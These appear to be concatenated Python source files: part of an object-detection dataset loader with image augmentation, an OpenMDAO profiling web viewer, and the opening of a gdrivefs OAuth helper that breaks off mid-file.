self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
iprofile_app.py | from __future__ import print_function
import os
import sys
import time
import webbrowser
import threading
import json
from six import iteritems, itervalues
try:
import tornado
import tornado.ioloop
import tornado.web
except ImportError:
tornado = None
from collections import defaultdict, deque
from itertools import groupby
from openmdao.devtools.iprofile import _process_profile, _iprof_py_file
from openmdao.devtools.iprof_utils import func_group, _setup_func_group
from openmdao.utils.mpi import MPI
def _launch_browser(port):
"""
Open the default web browser to localhost:<port>
"""
time.sleep(1)
webbrowser.get().open('http://localhost:%s' % port)
def _startThread(fn):
"""
Start a daemon thread running the given function.
"""
thread = threading.Thread(target=fn)
thread.setDaemon(True)
thread.start()
return thread
def _parent_key(d):
"""
Return the function path of the parent of function specified by 'id' in the given dict.
"""
parts = d['id'].rsplit('|', 1)
if len(parts) == 1:
return ''
return parts[0]
def _stratify(call_data, sortby='time'):
"""
Group node data by depth and sort within a depth by parent and 'sortby'.
"""
depth_groups = []
node_list = [] # all nodes in a single list
depthfunc=lambda d: d['depth']
for key, group in groupby(sorted(call_data.values(), key=depthfunc), key=depthfunc):
# now further group each group by parent, then sort those in descending order
# by 'sortby'
depth_groups.append({
key: sorted(sub, key=lambda d: d[sortby], reverse=True)
for key, sub in groupby(sorted(group, key=_parent_key), key=_parent_key)
})
max_depth = len(depth_groups)
delta_y = 1.0 / max_depth
y = 0
max_x = call_data['$total'][sortby]
for depth, pardict in enumerate(depth_groups):
y0 = delta_y * depth
y1 = y0 + delta_y
for parent, children in iteritems(pardict):
if not parent:
end_x = 0
else:
end_x = call_data[parent]['x0'] * max_x
for i, node in enumerate(children):
start_x = end_x
end_x += node[sortby]
node['x0'] = start_x / max_x
node['x1'] = end_x / max_x
node['y0'] = y0
node['y1'] = y1
node['idx'] = len(node_list)
node_list.append(node)
return depth_groups, node_list
def _iprof_setup_parser(parser):
if not func_group:
_setup_func_group()
parser.add_argument('-p', '--port', action='store', dest='port',
default=8009, type=int,
help='port used for web server')
parser.add_argument('--no_browser', action='store_true', dest='noshow',
help="Don't pop up a browser to view the data.")
parser.add_argument('-t', '--title', action='store', dest='title',
default='Profile of Method Calls by Instance',
help='Title to be displayed above profiling view.')
parser.add_argument('-g', '--group', action='store', dest='methods',
default='openmdao',
help='Determines which group of methods will be tracked. Current '
'options are: %s and "openmdao" is the default' %
sorted(func_group.keys()))
parser.add_argument('-m', '--maxcalls', action='store', dest='maxcalls',
default=15000, type=int,
help='Maximum number of calls displayed at one time. Default=15000.')
parser.add_argument('file', metavar='file', nargs='+',
help='Raw profile data files or a python file.')
if tornado is None:
def _iprof_exec(options, user_args):
"""
Called from a command line to instance based profile data in a web page.
"""
raise RuntimeError("The 'iprof' function requires the 'tornado' package. "
"You can install it using 'pip install tornado'.")
else:
class _Application(tornado.web.Application):
def __init__(self, options):
self.call_data, _ = _process_profile(options.file)
self.depth_groups, self.node_list = _stratify(self.call_data)
self.options = options
# assemble our call_data nodes into a tree structure, where each
# entry contains that node's call data and a dict containing each
# child keyed by call path.
self.call_tree = tree = defaultdict(lambda : [None, {}])
for path, data in iteritems(self.call_data):
data['id'] = path
parts = path.rsplit('|', 1)
# add our node to our parent
if len(parts) > 1:
tree[parts[0]][1][path] = data
tree[path][0] = data
handlers = [
(r"/", _Index),
(r"/func/([0-9]+)", _Function),
]
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
)
super(_Application, self).__init__(handlers, **settings)
def get_nodes(self, idx):
"""
Yield all children of the given root up to a maximum number stored in options.maxcalls.
"""
if idx == 0:
root = self.call_tree['$total']
else:
root = self.node_list[idx]
root = self.call_tree[root['id']]
maxcalls = self.options.maxcalls
stack = deque()
stack.appendleft(root)
callcount = 1
stop_adding = False
while stack:
parent, children = stack.pop()
yield parent
if not stop_adding:
callcount += len(children)
if callcount <= maxcalls:
for child in itervalues(children):
stack.appendleft(self.call_tree[child['id']])
else:
stop_adding = True
class _Index(tornado.web.RequestHandler):
def get(self):
"""
Load the page template and request call data nodes starting at idx=0.
"""
app = self.application
self.render("iprofview.html", title=app.options.title)
class _Function(tornado.web.RequestHandler):
def get(self, idx):
"""
Request an updated list of call data nodes, rooted at the node specified by idx.
"""
app = self.application
dump = json.dumps(list(app.get_nodes(int(idx))))
self.set_header('Content-Type', 'application/json')
self.write(dump)
def _iprof_exec(options, user_args):
"""
Called from a command line to instance based profile data in a web page.
"""
if options.file[0].endswith('.py'):
if len(options.file) > 1:
print("iprofview can only process a single python file.", file=sys.stderr)
sys.exit(-1)
_iprof_py_file(options, user_args)
if MPI:
options.file = ['iprof.%d' % i for i in range(MPI.COMM_WORLD.size)]
else:
options.file = ['iprof.0']
if not options.noshow and (not MPI or MPI.COMM_WORLD.rank == 0):
app = _Application(options)
app.listen(options.port)
print("starting server on port %d" % options.port)
serve_thread = _startThread(tornado.ioloop.IOLoop.current().start)
launch_thread = _startThread(lambda: _launch_browser(options.port))
while serve_thread.isAlive():
serve_thread.join(timeout=1)
|
auto_auth.py | import logging
import threading
import webbrowser
import time
import urllib.parse
import socketserver
import http.server
import io
import gdrivefs.oauth_authorize
import gdrivefs.conf
_LOGGER = logging.getLogger(__name__)
class _HTTPRequest(http.server.BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = io.StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
class _WebserverMonitor(object):
def __init__(self, filepath):
self.__filepath = filepath
# Allows us to be in sync when starting and stopping the thread.
self.__server_state_e = threading.Event()
self.__t = threading.Thread(target=self.__thread)
self._port = None
# Signaled when the authorization response is received.
self._request_state_e = threading.Event()
# Will be assigned with the response from Google.
self._http_status_raw = None
def start(self):
self.__t.start()
# Wait for the loop to change the event state.
_LOGGER.debug("Waiting for thread to start.")
self.__server_state_e.wait()
_LOGGER.debug("Server is now running.")
self.__server_state_e.clear()
def stop(self):
assert \
self.__server_state_e is not None, \
"Thread doesn't appear to have ever been started."
assert \
self.__t.is_alive() is True, \
"Thread doesn't appear to be running."
self.__server_state_e.clear()
self.__s.shutdown()
# Wait for the loop to change the event state.
_LOGGER.debug("Waiting for thread to stop.")
self.__server_state_e.wait()
_LOGGER.debug("Server is no longer running.")
self.__server_state_e.clear()
def __thread(self):
"""Where the main loop lives."""
_LOGGER.debug("Webserver is starting.")
monitor = self
# Embedding this because it's so trivial.
class Handler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
# We have the first line of the response with the authorization code
# passed as a query argument.
#
# Example:
#
